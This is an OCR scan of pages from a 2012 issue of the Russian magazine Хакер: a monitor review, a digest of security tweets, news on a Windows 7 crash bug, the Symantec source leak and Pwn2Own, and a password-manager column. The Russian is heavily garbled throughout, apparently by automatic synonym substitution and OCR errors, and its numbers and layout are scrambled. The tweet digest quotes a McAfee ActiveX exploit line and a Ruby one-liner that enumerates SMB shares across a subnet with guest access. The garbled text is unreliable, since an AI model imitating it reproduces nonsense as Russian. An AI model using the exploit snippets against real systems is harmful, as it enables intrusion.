нитора нате РL5-матрице, представленные во прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены во тулово изо д овольнодешевого скульптура равно во

результа т е имели засве т ы, битые пиксели равным образом т. п. П охоже, тепер ь 0amsuпg решил а ис пр авить э т с промах.

Мо д дерево 027 В 070 выпо л нена во соли д ном равно одновре­ менно вместе с во ерхтонком корпусе, а всё-таки круги управления

помещены на эргономичную алюминиевую подставку !там же нахо д ятся брюки ввода - вывода равно U 0 В -концентраторl , регулируемую за высоте. Д иапазон регулирования монитора 0-й серии объединение высо т е составляет

00 см,

совершенство его

позволено н а клонять. П а н ел ь имеет ультравысокую толковость

QHD 02560 х 04401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI да Н DMI, а опять же оснащена стереодинамика ­ ми мощностью 0 Вт да интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов равным образом планшетных П К. Устройство п что до дд ерживает эксклюзивную технологию

0amsung

Nat uг al Соlог Е х р ег t , для во озмож н восход ваш покорный слуга м которой

относитс моя персона аппаратная ка л ибровка цветов. 027 В 070

а <<эффект мокрой шмотье >> !, какой много раз проявляе т ся

ловок рисовать больше миллиарда оттенков, почто

дажеутоповых современных дисплеев. Так в качестве кого <<кристал­

гарантирует офигенный реализм равным образом покрой подле отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий да ви д еороликов, сделанных со через

нели, у глянцевых мониторов симпатия на поверку отсутствует.

нумерационный фо т о- иначе видеокамеры. Кстати, пресс-релиз

Здесь стоит только заметить, аюшки? равно первые образцы получи и распишись базе

обещае т, ась? инже н еры 0amsuпg вруч н ую будут на­

вызвали немалое возрождение утех, с целью кого заранее итого

страи во ать ц ветопере д ачу для аждого монитора серии

0

PL5

Яр кость: 000 кд/м 0 Равномерность )мин .): 00% К спирт т растность (статичес для ая) :

0000:1 Время отклика

(GTG): 0 м с Угол обзора (гор/верт.) : 078°/1 08°

на хоть н по отношению удобство н ое на зыркалки изображение, безвыездно сообразно праздник а

сверху окончательном этапе сборки. Кроме в таком случае г об , все место

причине : РL5 - дисплеи вместе с матовым экраном приземленно

дисплея как и снабжена антибликовым стеклянным 011

отнюдь не проявляли <<кристаллическо г касательно эффекта>>.

покрытием. Да-да, не без; т арое доброе конденсор со антибликом,

Р а зрешение : 0560х 0440 Глуб ан а цвета : 0,07 млн цветов

Ожидается, почто новинка поступит во продажууже на мар­

давненько я такого невыгодный видели. Этот завершающий различие

те текущего возраст lк сожалению, неизвестно, появится ли

обязан особенно обра д что касается на атыех, чьи зеницы чувствитель­

возлюбленная в свою очередь равно на России!. Ориентировочная валюта 027В970

ны ко где-то н я ы ваемому <<к ри ста л ли ч ескому эффекту>> !он

состави т $1199.

ЭТА МУЗЫКА БУДЕТ ВЕЧНОЙ. ПАТЕНТНЫЕ ВОЙНЫ ПРОДОЛЖАЮТСЯ

APPLEOБBИHЯETSAMSUNG ELECTRONICS В ТОМ, ЧТО ЧЕХЛЫ ДЛЯ ПЛАНШЕТАGАLАХУТАВ 00.1

И СМАРТФОНОВ (!) НАРУШАЮТ ЕЕ ПАТЕНТЫ

010

ХАКЕР

03/158/ 0012


PhoneAndroid: Почти закончил вместе с

linux.js. Да,

сие

моя JаvаSсгiрt-реализация ядра

Linux.

[]

Почему вас держи меня этак

Яндекс, сnециалист по части безопас­

Chгoot-ing во

ности веб-приложений: спе­

легко, в качестве кого равным образом А : , Б:, В : ...

циалист сообразно безопасности веб­

http://Ьit . lv/yQQq_ml:J .

Windows- таково

но

приложений на компанию Яндекс ...

Ь.it.lvд'ol.,m_!?.<J .

Комментарий:

Да, во винде равным образом дозволяется <<чрутить>> ...

lilcBekrar: Взлом Chгome не без;

ASLR + О ЕР­

обходом + славный сnлойт к

Комментарий: Конкурс Яндекса

El

по части взлому сервисов прошел удачно;] . lil_sinnЗr:

обхода nесочницы за сов? Мы живем на разных мирах .

El

0О для бак­ #pwn2own

А вона да РоС интересах

lilcBekrar:

Комментарий: Фронтмен компании

Vupen

Большой #fаil-приз отправляется

возму­

для

щается призовым фондом предстоящего

конкурса

PWN20WN.

McAfee SaaS 0-day IZDI-12-012]: obj.ShowRepoгt "calc.exe" .

Защитные механи1мы

становятся по сию пору сложнее, равным образом интересах их обхода требуется в большинстве случаев сил равно вложений ...

McAfee

Secuгity-as-a-Service,

тот или другой устанавливает позор­

ный

ActiveX,

I:Jjt.jyд_bj..t_gf

Комментарий:

Вот равно круглый эксплойт- obj.ShowRepoгt

позволяющий проводить в жизнь адрес

"calc.exe".

via rathezdi.

пания устанавливает «бэкдорь~» клиентам.

Да ... чисто в такой мере антивирусная ком­

А сызнова забавно, который эа такую

тила во районе

lilmartincronje:

lilmeder: Написал на блог об моем послед­

Водан в один из дней да пользу кого всех :

нем баге:

CSS

сиречь JаvаSсгiрt-библиотек

будто

jQuery.

CVE-2011-3923.

Еще

одно удаленное материализация

стих на Stгuts2: Ьlt.R:fiЬ.i.!JYLY.E.iЬ.ы.

El

0-day ZDI запла­ 1-2 ко баксов . :] Вот что-то около ...

El

Комментарий:

HTML5 !=

Комментарий:

Исходникам далеко не доверяй никогда, Люк! Дебаггером воспользуйся вначале равно убедись во потоке

Кэп ...

Сегодня у нас достаточно счета ссылок­

общеобразовательный выход т витов, так сказать. Те, который думает, почто получи

Java

lilmikesica:

позволяется

Любой благоприятный конструктор лени­

кадить, безграмотный оnасаясь RСЕ-багов !ну равно как же,

вый, тем далеко не менее, безграмотный произвольный

Java- сие ж секурно], вообразите снова раэ! Ведь накадить позволено всякое ...

сонливый конструктор хороший.

Если бы РНР был британским:

peгchance ifcondition] { // Code hеге}

otherwise { // Code hеге }.

liljcran: Написал свежий блог-пост: отыскивание

багов на виртуальной машине с через «Докаэателя тео­

рем» - bl.lgД.pjt . [y/~J.gZ~К.

El

Комментарий:

Не фаззингам единым ... те, кто такой инте­

ресуется методами поиска уяэвимостей,

Ручной-- iгЬ> l1 .. 054].each {lxl puts "host- 00.0 . 0 . #{х}"; 'smbclient -L 00.0.0.#{х} -Uguest -N' }.

El

Комментарий:

RuЬу-скрипт про скана «шар» вместе с учет­

который гостя ...

обратите интерес держи это.

lilstephenfewer: Открыл порцию исходников моей системы фаззинга чтобы браузеров

Не знал что до BinScope: hllQJLI:Ij_tJYLyzcQYR . Полезна

на

обнаружения бинарников кроме

NX, SafeSEH, /dynamicbase, равным образом т . д.

'Fгindeг'- http:UЬit.lyLx.rUJJiW.

ХАКЕР

03/158/2012

.,,


В СЕТИ В ВИДЕ ТЕКСТОВОГО ФАЙЛА оказалисьданные в рассуждении шести миллионах nоль з ователей крупнейшей во КНР комnании­ разработчика сетевого ПО (CSDNI.

MEGANEWS

МИНИСТР СВЯЗИ ПОСЕТИЛ

СОБРАНИЕ ПИРАТСКОЙ ПАРТ ИИ ПАРАДОКСАЛЬНО, НО ЭТО СОБЫТИЕ ИМЕЛО МЕСТО В РОССИИ

В хо д е бесе д ы от что до Щ е ­

BSOD

В

WINDOWS 0

ЛЕГКИМ ДВИЖЕНИЕМ РУКИ НАЙДЕНА КРИТИЧЕСКАЯ ДЫРКА В ссСЕМЕРКЕн

голевым выясни­ л ось, ч так на це ло м в рассуждении н

п об ддержи на аети д е ю о ткрыты х д анн ы х , н насчёт д ек покровитель ац ию что до т­ к рытого госуд а рства как-т относительно « безграмотный по отношению цени л •>.

Кстати, официал ь ­

равным образом

нф что до р ма ция об н относительно завывание н е ради ко рытой ко ритиче из ко в рассуждении й у пишущий эти строки з вим ос т равным образом во Wind ow s 0 х6 0 вп е рвы е появила не без; ь в Т витт е р е изв yes тн по отношению г в отношении ха кера

w3bd3vi l. Б а г был wi n32k.sys [ н ео д только кр а т н ы й вин относительно вни ко кри т ич есть ки х ошиб относительно для на Win XPI.

касательно бнар у ж е н во ф а йле операционной систем ы

ных коммента р ие во

ко т в рассуждении ры й не без; по части д е р жи т следовать во ис ящ у ю по отношению т ядра ча вместе с ть п по части льз об ва­

п относительно поводупри­

т е л ьско г по части ан т е р ф е йс а равным образом об тн ос ящ уюс моя персона ко нем у инфрастр у к­

сутствия главы Ми н­ комсвязи в встреч е

ту р у. Зам е тим, чт в отношении 02 - би тн а ваш покорнейший слуга во е р со ия ОС неграмотный в от nриимчива

членов Пиратск в рассуждении й

ко ош ибке, во в таком случае вр е мя ко ак 0 0- б итная << Семерка » может

партиитак да неграмотный по­

н е толь ко у й т равно равным образом з-з а никак не е на

следова л в рассуждении .

BSOD,

так равным образом nозволяе т насадить

на ма ш да н у вр е д об н ос ный для относительно д возьми у р ов невыгодный ядра. Однако самый ин т е р нашел ны й нюан из з а ко лючается на др у гом: пр относительно тотип заключение , демонс т риру ющ е го , в духе вам з ы ва т ь отваленный из потому что й, поуже у тек в С е ть . О ко а з а лос ь , ч в таком случае сие пр ос т ой НТМ L- скрипт. Е г относительно з а­ п уск на б ра узе р е

Sa fari б ы от тр относительно пр иведет ко ошиб ке со тра н и­

ц ы бери н е спр е д е л е н сверху м у ча вместе с т для е nамяти, равным образом авто n об кажет

•с равно н ий э катабалка вместе с м е рти ». Этотскриn т представля е тсоб по отношению й все г по отношению просто-напросто т е г

iframe из чр ез выч ай н насчёт б что до льшим атриб у книжка

высо т ы. Уя зви м ос т равно т в рассуждении чн об п относительно дв е р а бери 04-битная видоизменение

ко

а для ясный путь , во России П ира т екая содружество даж е отнюдь не зарегистрирована [нет,

Windows 0, в отношении дн ако,

ребята пытались , да нисколько безграмотный ваш брат ш ло) . Тем малограмотный м е нее, парок т ия систематически

ском п р насчёт ме аттракцион касательно на практически ы равно др у г ие из да со темы. Патчана настоящий

nроводитсобрания,одноизкоторыхсостоялосьв вместе с ерединея н варвара

момен т н е су щ е ств американский рубль т .

что с м е ч аю т э для от перты , м по части г у т являться

во книж н ом магазине << Ц иолко на скиЙ>>, к~то ры й наход ится во зда н ии П олитехниче ­ ского музея . Д ля всех пришедших сверху совмест н ый выручка П иратской n артии, Ф симпатия д а развития электронной демократии равно рабочей группы << ИГ опротестование н ых действий>> стало полной неожиданностью рождение на магазине Игоря Щ еголе во а , ми н равным образом ­

стра маза да массовых коммуникаций РФ. П редсе д атель партии П а во ел Р ассуд по части в nишет на своем ЖЖ : << М инистр есть вид. в духе будт относительно зашел на на ы хо дн ой купит ь п ару для ниг равно шиш невыгодный знал что касается н амечен н относительно м собрании. П рисутст на ую щишки е н а во стре ч е п ро г раммеры вместе с р азу нак ан ул ись получи и распишись Щ е г репатриант на а. Ещ е быl Н е каж д ый д е н ь йес т ь возможность выразить на се в чем дело? думаешь на физиомордия министру связи. Ау n р по части гр ам ми­

стов было зачем ему сказать.

:1 Н по части министрдержался молодцом, говорил ск л а дн о,

все отнюдь не сказал нисколько конкретного. Сразу различимо - крупный опы т работ ы в аппарате >> . Щеголев ответил бери линия вопросов, ради д анных учас т никами собра ­ ния. В частности, рассказа л , аюшки? после го д -по л пятикнижие на Р оссии може т б ыть вв е д е н а

построение электронного голосова н ия, все общество, по мнению ми н равным образом ю минис т ра, пока безвыгодный испытывает nотребнос т да на такого склада системе. П одробности на ЖЖ П авла

Рассудова:

webpo lit.livejournal.com/72397.htm l.

NGIИX сс ВИНЧЕСТЕРНЫЙ» ГИГАНТ

NGINX ВЫШЕЛ НА ВТОРОЕ

ТН Е Pl RATE ВАУ &ОЛЬ-

-компания

МЕСТО до числу обслужи-

ШЕ НЕ &УДЕТ ХРАНИТЬ

TORRENTFREAKCOO&ЩАЕТ, чт насчёт Cr ysis 0 стала

приобрелаподразделение

ваемых активных сайтов,

ТОRRЕNТ-ФАЙЛЫ равным образом nолно-

вместе с амо й скач равно ваемойчерез

nомощью шелковица а обвинил

комnании

обогнав

стью п е р е й -де т получи и распишись magnet-

BitТo r rent игрой пользу кого РС

ссы л ки. Теn ерь magnet-U RL

во 00 01 г оду. С л едо м да дутСаll of Du ty: Modern Warfa r e 0 и Battlefield 0.

Google на nоддержке nиратства . В Google сnоко й да вдоволь

Seagate-

Samsung сообразно ошибаться

изводству жестких дисков.

Суммасделкисоставила

$1,375 млрд.

012

Microsoft 015. По данным комnании NetCraft, на первом месте nока Apache (57,93 %).

предлаг аю т вместе с автор дл пишущий эти строки загруз ки по умолчани ю .

МЕДИАМАГНАТРУПЕРТ

МЕРДОК завел Twitter да вместе с его

звалиобвинение чушью .

ХАКЕР

03 /158/ 0012


GOOGLE НА ТРИ ГОДА ПРОДЛИЛАСОГЛАШЕНИЕ С MOZILLA об исnольз овании своего nоисковика во качестве основногодля Fiгefox .

БОЛЬШЕ КОЛОНОК, ХОРОШИХ

MICROSOFT, КОНКУРЕНТЫ

И РАЗНЫХ

ИАRМ-СИСТЕМЫ

СРЕДНИЙ ЦЕНОВОЙ СЕГМЕНТ И НЕИЗМЕННО ВЫСОКОЕ КАЧЕСТВО.

О НЕ ВСЕГДА ЧЕСТНОЙ БОРЬБЕ ЗА МЕСТО ПОД

КОНЕЧНО, ЭТО

СОЛНЦЕМ

EDIFIER

Е

ще во конце прошлого возраст общество

Microsoft

сделала заявление, которое породило у многих

нехорошие подозрения . Напомним, в отношении нежели изволь говорок .

В конце 0011-го шатия

Microsoft впервой озвучила , что Windows8 будеттребовать Secuгe Ьооtдля загрузки [то есть обязательной активации режима безопасной загрузки

UEFII. Эта деятельность занятие е ттак : UEFI сохраняет«секретные ключи >> во ОС. Все, что-нибудь хочетзагрузиться для компьютер, для при­ меру операционная система, равным образом не без; польз условная единица тэти ключи на до­

вместе с туп а для

UEFI. Е сли во ОС никак не прописан заслуженный родничек ,

симпатия никак не получит санкция возьми загрузку. Liпu х-сооб ще вместе с тво уже тут попыталосьдонести впредь до пр оиз водителей , что-нибудь

провести в жизнь передач у ключей в из-за что такое? учредить

Linu x бросьте куда сложно, Linu x сверху заточенные по-под Windows8

устройствастанетпрактически невозможно.

Однако

Microsoft корректно пояснила , что-нибудь невыгодный имеет Linu x да дру ги х в отношении ткрыты х ОС , равным образом сражается

синь порох в сравнении вместе с чем

ни крошки безграмотный со ко нк у р е нтами , а из вредоносными кодами. Мол , безопасная нагрузка тем да х ороша про работы

ко

итайская братия Edi fieг представила на э том месяце махом двум новых модели. Об е новинки по­

полнили топовую линей ку систем

0.0. П ервое ауд ио-ре ш е ние- колонки R1500TM

от пр о­

фессиональным микрофонным входом, некоторый имеет независимый стабилизатор громкости . Новинка может похва­

случаться тради ц ионным к

Edifier деревянным

кор пусом

[что гарантирует по отношению т сутствие резонансов!, НЧ-дина миками

napa

интересных

фактов : получи заводах

компании Edifier производится более 12 млн комплектов мультимедийных к по части лонок на годок . За­ воды расположены на трех континен­

тах. Научно­ исследовательским

вместе с магнитным экра н иро на а нием равным образом 08-мм шел ковыми ку­

центром компании

полообразными твитерами . Стереосигнал, подаваемый

руководит глобально

нате входные разъемы

RCA,

обраба тывает ся схемой дина­

мическо г касательно повышения высоких частот, которая спе циаль­

знатный конструктор

вредоно сных программ. Надо признать, выглядит безвыездно это действительно логично. Но в настоящее время

Microsoft подготовила дезоксикортикостерон уме нте требова­

ниями, которые надлежит выполнитьдля сертификации компьютеров для со вместимо ст ь не без; Windows 0. Бумага , увы,

подтвержд ает худшие опасения. Здесьлучше сумме про­ цитировать.

Официальн ое руко водстводляпроизводителей,желаю­ щи х настил бить сер тификацию Windows 0для своих усик тро йств,

равным образом конструктор Фил

со траница

Джонс .

мо привести в исполнение способ отключения

однако разработана чтобы мультиме диа.

Windows, зачем

такойпроцессперекрываетещеодинканалпроникновения

016: « В системах, безграмотный относящихся кАRМ, необходи­ Secure Boot чрез

интерфейсустановки прошивки . Физически присутствую­

Вторая новика-двухполосные колонки R900Т. Эта акустическая 0 . 0-система, оснащенная 0-дюймовыми НЧ-динамиками да 03-мм шелковыми куполообразными

щий пользовательд относительно лж е н совмещать достижимость отключить

Secure Boot посредством интерфейс установки, безвыгодный владея Pkpri v. Программное обесточивание Secure Boot средствами UEFI

т ви терами, ладно воспроизводитгл убок ий, обеспеченный

малограмотный надлежит фигурировать вроде ни умереть и безвыгодный встать пора ради грузки , ни за ее

певец равным образом зво нки е высокие частоты. Габариты

касательно кончании>>.

скромны:

040 х 026 х 097 мм.

R900T до боли

Колонки мелочёвка отсоединить

П олучается, рапорт

Microsoft от м, что такое? возлюбленная небу­

для выбранн ым источникам сигнала путем 0,5-мм не без; тер еовхо д

деттребоватьотnроизводителей «ж елеза•запретить

RCA либо RCA получай RCA,

остановка

ко торые со п особ ны получить равно уси струить

Secure Boot, бери деле распространялось только лишь

сигнал, входящий из любого источника звука, равным образом обес пе­

для традиционные ПК , н в рассуждении невыгодный получи АRМ-устройства. Пр оизво­

читьвысокоекачество звучания.

дит е ли систем, базирующихся для ар х итектуре ARM , теперь не поперед лжны давать никаких способов отключения безопасной загрузки. Именно текущий одну секунду - обязательная

ПОВСЕМЕСТНАЯАВТОМАТИЗАЦИЯ

безопасная погрузка -ставит Linu x [и безвыгодный только! во затруд­ нительное положение. Фактически сие озна чает, чтотеперь для «за гружаемости >> нате одной изо таких машин , сертифици­ рованных для соединимость от Windows

ПО АДРЕСУ MEGASEARCH.CC ЗАРАБОТАЛ АГРЕ ГАТОР КАРДЕРСКИХ МАГАЗИНОВ, ТО ЕСТЬ РЕСУРС ДЛЯ ПОИСКА ВОРОВАННЬIХ БАНКОВСКИХ КАРТ ХАКЕР

03/158/ 00 02

0, отвечающий требованиям

ди вместе с трибутив Linuхдолжен у кого есть се ртифицированные крип­ таключи с конкретного равным образом з г отови т ел мы компьютера. Вста е т ре з онный вопрос: идеже их взять? Е сли выдачей ключей будут за ниматься производители , ведь разработчикам ди стрибу ­ тивов придется поверстно контактировать из каждым с ни х.

Иеслиогромная ко рпорацияможет се бетакоепозволит~ толин укс оидам сие врядли окажется около силу. Централи­ зова нного в отношении ргана сер тификации , тот или иной бы формировал к лючи про режима безопасной загрузки

UEFI, безвыгодный существует. Microsoft пытается спорить далеко н е лишь только не без; малварью, однако равным образом вместе с устано на ко ой Linu x, Android равно др у­ Словом, до хоже,

ги х открытых ОС для АRМ-системы.

013


MEGANEWS

КАРСТЕН НОЛ ИЭSECURIТY RESEARCH LАВS сделал очереднуюуязвимость на GSM . Подробности возлюбленный доколь невыгодный разглашает. ·

СКАЧАЙ И РАСПЕЧАТАЙ!

PWN20WN

ПИРАТИТЬ ЧЕРЕЗ СЕТЬ МОЖНО НЕ ТОЛЬКО ИНФОРМАЦИЮ,

ПРАВИЛА

МЕНЯЕТ

НО И ВПОЛНЕ РЕАЛЬНЫЕ ОБЪЕКТЫ

ПОПУЛЯРНЫЙ КОНКУРС В ЭТОМ ГОДУПРОЙДЕТ В НОВОМ ФОРМАТЕ

м

ы поуже безграмотный ра з рас­

сказывали тебе о замечательномха­

кереком конкурсе

Pwn20wn,

учас тни кико т ороголомают

самый разнокалиберный софт равно желе­ зо, а nотом уносят со внешне

хакнутыетрофеи [железные, конечно же) на качестве присутствие ­ зов. Сообщаем, что-нибудь во этом году распорядок соревнования

изменились. Теперь во конкур­ се участвуюттолько

з

Microsoft Apple Safaгi, Google Chrome равно Mozilla lnteгnet Exploгer,

0-принтеры долго , хотя точно про­ бираются нате покупательский торжок .

Уже безотлагательно экий девайс [к примеру,

японскую

Firef oxдля операционных си­

iModela) мож так возле отыскать из-за пару

стем

вариант, а невыгодный хуже некуда производственный беннер не­

вообразимых размеров. С каждым белым днем об этих трехмерных чудесах прогресса появляется всё-таки

значительнее статей, постов, дискуссий. А присест интерес и испытание растут, появляется равным образом меморандум .

Ещ е пр по части шлой в осеннее время сверху т орре нт-тр екере

The Pirate Ва уоткр ыл ся

раздел из пр ограммами

в целях 00-принтеров, да какая-то активность наметиласьтамтолькосейчас.Д об рыелюди

Windows 0 да

Мае

05 Lion

[последние версии со все-

тысяч долларов, да э т насчёт короче как «домашний»

ми патчами). Мобильные

Одним с особо

девайсына конкурсе хлеще

известны х про·

вскрывать невыгодный будут.

ектов в соответствии с ЗD·печати является

RepRap

Главным сnонсором объявле-

-открытый прое для т

нате бражка

соответственно созданию принте­

Hewlett- Packard. 30

р об во , способных

Три по мнению бедителя получат денежныепризыв размере 00тысяч,

воссоздавать

тысяч равно 05тысяч долларов плюстрофеи во виде н аутбуков со праздник самой

себя. Новейшая

системой , которую им удастся взломать.

форма называется

Mendel, равно сосредоточить

Компания

Google вдобавок учреди ла дополнительные призы 20 тысяч долла­

наконец-то начали разбиваться что график ми,

ее ловок любой желающий (это

в такой мере да реальными объектами. Уже в ту же минуту на этом

воистину не·

траншея вслед исnолнение sandbox-кoдa не без; исnользованием одной всего только

разделе дозволяется из кача ть пластма ссово го робота

сложно!. Стоимость

уязвимости во

вслед взламывание браузера Chгome. Она обе щает быть в расчете

всех компонентов

Chrome.

В

0О тысяч долларов оценивается

ис п олне н ие

с вселенной Warhammeг 00К сиречь хот-род­

составляет общей сложности

sandbox-кoдa из исnользованием уязвимастей в духе на Chгome, в такой мере равным образом во

мо д е ль ш евроле

$520.

операционной системе.

0970 возраст .

Н об сие безобидные

игру ш ки, а так-таки во Сети сейчас некоторое времена цир­

Но самое главное, что-то на этом году изменятся самочки взгляды на жизнь

кулируютслухи от м, в чем дело? возьми черном рынкетор­

Pwn20wn . Взломанная построение теnерь неграмотный куда там

гуюти30-моделямискиммеровдлябанкоматов.

зания, по образу вначале . Все другие участники имеют мочь

изо состя­

Есть даж е n одтверж д е ния тому, аюшки? моше нни ки

во изм трех конкурсных дней открывать ее своими методами.

действительнопольэуютсятакимимоделями!

Соответственно, итог соревнования об эту пору подсчитывается

Н е т, на « Б ухте» они нонче невыгодный на сплывали, хотя сие

no очкам.

неприкрыто воnрос времени . По хоже, у правоохрани­

В этом году

тельных органов до всему миру борзо появится

курсе дозволено входить в состав равным образом на удаленном режиме!

Pwn20wn

nройдете

0 в соответствии с 0 марта.

Не забывай, что-то во кон ­

до оный поры что до дна головная цисталгия .

КОМПАНИЯSОNУПРЕД­

СТАВИЛА КАРТЬI ПАМЯТИ

SONY

собственного формата

XQD.

Ориентированы они как на профессиональных фото­ графов, этак равно бери энтузиастов.

В режимах чтения\эаписи

H

Seri senees

02 GB

пропускная струнка

достигает

0 Гбит/с (125

XQD

Мб/с) .

ДВАДЦАТЬВОСЬМОГО

КОМПАНИЯ TIOBE SOFTWARE

Продажи сделано начались. Карта

ЯНВАРЯ СТАРТОВАЛ ВТОРОЙ

УДОСТОИЛАОВJЕСТIVЕ-С

QD-H16 объемом 06 Г б стоит $130, QD-H32 держи 02 Г б- $230,

FACEBOOK HACKERCUP,

ЗВАНИЯ «ЯЭЬIК ГОДА».

тот или иной проводится еже­

Однако получи первом месте

Также представлены равно устрой­

годно . Лучших ждет командировка

до популярнотипо-прежнему

ства интересах работы из новым

на штаб-квартиру Facebook,

овчинка выделки стоит Java, а вслед ней идут С,

а победительполучитпять

С# равно С++.

форматом.

тысяч долларов.

ХАКЕР

03/158/2012


• •

~ WI!XLI!Г.

www.wexler.ru

Электронная исследование не без; доступом во Интернет

У SYMANTEC УКРАЛ И ИСХОДНЫЕ КОДЫ АНТИВИРУСА

Читай. Смотри. Слушай.

ХАКЕРЫДИСКРЕДИТИРОВАЛИПОПУЛЯРНОГО ВЕНДОРА

оддавлением хакеров команда Symaпtec, являющаяся одним с самых известных во мире поставщиков решений

во сфере информационной безопасности, была вынуждена признать, зачем хаке рам посчастливилось получитьдоступ ко исходному коду це ­

лого ряда ее прод уктов. По словам представителей Symaпtec, во ходе расследования было установлено, что-нибудь покража исходного заключение анти­

вирусов произошла сызнова на

0006 году.

После сего шарашка ввела шпалеры

мер чтобы усиления безопасности, дай тебе отнюдь не счесть повторения по­ добных инцидентов на будущем. Хакерам посчастливилось расхитить исходные коды таких продуктов, наравне Nогtоп Aпtiviгus Согрогаtе Editi oп, Nогtоп l nteгпet Secuгity, Nогtоп SystemWoгks равным образом pcAnywheгe версий

02.0, 12.5. Об утечке выходит установлено на середине прошлого месяца, когда некоторый пират Yama Tough, причисляющий себя да ко «Ано нимам», и ко хакерекой группировке Lo гd of Dhaгmaгaja, написал во Твиттере, что располагает исходниками Noгton Utilities. В улика он 12.1

равным образом

выложил ссылки получи нищенский грамота от описанием программно­ го интерфейса сервиса к создания касательно писаний образцов вирусов,

а впоследствии да не без; писок файлов, содержащихся во архиве не без; исходным кодом Nогtоп Antiviгus. Опубликованный дезоксикортикостерон у мент, кстати, датируется апрелем

0999 года.

Конечно же,

Symantec моментально сообщила,

что-то

катамнез с сего документа невыгодный может подгадить нынешним продуктам компании. Зато картотека из выход ным кодом шарашка неграмотный про­ комментировала.

П что до заявлениям самих хакеров, информа цию им посчастливилось выудить

со серверов ведомства военной разведки Индии. Иными словами,

у воронка произошла отнюдь не с сетей самой Symaпtec [хоть сие радует). По некоторым данным, хактивисты опубликовали имеющуюся у них информацию, чтоб помочь судебному разбирательству, которое

на днях началось на США. Д есятого января насупротив Symaпtec было выдвинуто укор на том, который симпатия продвигаетсвою продукцию с через этак называемых sсагеwаге-программ, которые запугива­

надстройка пользователей, извещая их в отношении возможных проблемах со безопасно­ ст ью во особенно назойливой форме. Несмотря получи и распишись совершенно заявления Symaпtec, почто у хакеров оказались старые данные, которые далеко не могут принести никакого вреда, раз­

работчики сделано начали освобождать патчи. Компания предп очитает перестраховаться , за исключением зависимости оттого, откудова в частности «утекла»

данные да до какой степени возлюбленная актуальна получай заданный момент.

WEXLER.BOOK

МЫ ЛЕГИОН: ИСТОРИЯХАКТИВИСТОВ

ПРОФЕССИОНАЛЬНЫЕ ДОКУМЕНТАЛИСТЫ ИЗ КИНОКОМПАНИИ LUMINANT MEDIA СНЯЛИ

03-МИНУТНЫЙ ФИЛЬМ

О ВЕЛИКИХ И УЖАСНЫХ

ANONYMOUS ХАКЕР

Т7006

WI!XLI!Г. STORE

Удобный достуn для бесnлатным книгам и nоnулярные новинки.

Скачивайте равно читайте получай

www.wexler.ru!

:х:

относительно

«МЕТРО 0033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩ~

<t

ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО

Cl.. с:[

что касается

В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ WEXLER

r::

03/158/2012 ТЕЛЕФОН ГОРЯЧЕЙ ЛИНИИ : 0 (800) 000 06 00


IEADER

КОЛОНКАСТЁПЫИЛЬИНА

ОХРАНЕНИИ ПАРОЛЕЙ ВЫБОР РЕШЕНИЯ

тож извращаться вместе с его синхронизацией от

активировать на аккаунте

Использовать единолично равным образом оный а движение цена пользу кого всех

оный но самый Dг орЬох . Дост уп ко хранилищу

вые батман роли, в таком случае забраться сверх такого токе держи бросьте

сервисов сразу- одна с самых серьезных

защищен мастер-ключом [сложным паролем),

поуже невозможно. Каждый крата бросьте необхо­

ошибок пользователей. Но равно унять во голове

некоторый во целях безопасности чертовски

партия в отношении врезать флешку, впустить

огромное контингент уникальных пассов­

восстановить. Будь осторожен!:)

пустить в дело сгенерированный программой

НЕКОТОРЫЕ ФИШКИ LASTPASS Я неграмотный буду разглашать об том, на правах использо­

Только во этом случае не возбраняется бросьте по головке малограмотный погладить поперед

альтернатива безусловно непосильная. Я до второго пришествия пытался

одноразо­

Sesame

равным образом

параль совместно со своим мастер-ключом.

приучить себя ко использованию менеджеров

движение ролей небось

LastPass

KeyPass [keepass.info), хотя

изо сего приближенно нисколько равно безвыгодный вышло. Открывать

вать

программу, с целью приискивать в дальнейшем требующийся параль

могу неграмотный разделиться от тобой несколькими по­

-явно неграмотный самое удобное, ась? не грех приду­

лезными фишками, которые меня порадовали .

LastPass,- немного погодя

весь элементарно. Но далеко не

мать. Да равно локальное хранилище, на котором

хранилища. По отдельности который мастер-ключ, что флешка со

Sesame

сокровище про злоумыш­

ленника уж неграмотный представляют.

Двухфакторнан согласие сквозь

Google

находятся зашифрованные шаг роли, попахивает

Проверка надежности шаг ролей

Для авторизации твоя милость тоже можешь дать на лапу

архаизмом- малограмотный трепать но его получай флешке?

Водан исключительно видимое дело того , сколько шаг роли хранятся

неподдельный токен-например YuЬikey после

Короче говоря, автор решил отправить в рот решения,

во надежном хранилище, отнюдь не делает их по­

[ stoгe.yuЬico.com ),- а можешь воспользовать­

которые таково же, в духе да

настоящему безопасными.

ся сделано готовым решением с

KeyPass,

:)

помогали бы

LastPass

из твоего

Google.

$25

Напомню ,

порождать уникальные танцевальный шаг роли равным образом хранить

разрешения может выработать борзый испытание

зачем учение через поискового гиганта предлагает

их, же помимо бессознательно использо-

пассов, легко и просто отыскав внутри них простые да от­

установку насмартфон специального прило­

иди ко черту бы их на браузере! Вариантов тута отнюдь не беспричинно

кровенно слабые [вроде

жения

много. Среди специализированных решений

му встроен бенчмарк, какой высчитывает

«123456») . В програм­

[Google Authenticatoг), которая во произвольный

время времени генерирует незаурядный одно­

как никогда раскрученной оказалась схема

степень надежности всех паролей,- ре­

одноразовый ключ. Так в духе автор неусыпно пользуюсь

0Passwoгd [ agileЬits.com/onepasswoгd ), кото­

зультат позволяется соотнести со показателями других

этой системой интересах входа во

раиса изначально появилась про Мае, же далее

пользователей во специальном рейтинге.

настроил ее да про защиты

Одноразовые парали

са йте 0helpdesk.lastpass . com/secuгity-options/

goog 0е -а ut hе nti саtог).

была портирована равно про

Windows.

Продукт

куда качественный, однако отказываться от чего $69.99 вслед за

Gmail, так автор шелковица же LastPass . Подроб­

ную инструкцию не запрещается выискать для официальном

кроссплатформенную версию ми показалось

Многих, возможно , смутит реальность до­

слишком. Тем сильнее сегодня, эпизодически практиче­

холм для движение ролям от через одного исключительно

ски к просто-напросто дозволяется обнаружить бесплатную альтер­

мастер-ключа . Нет проблем! На флешку допускается

одноразовые парали равным образом двухфакторная автори­

нативу. Та ко вая, во общем-то, фактически

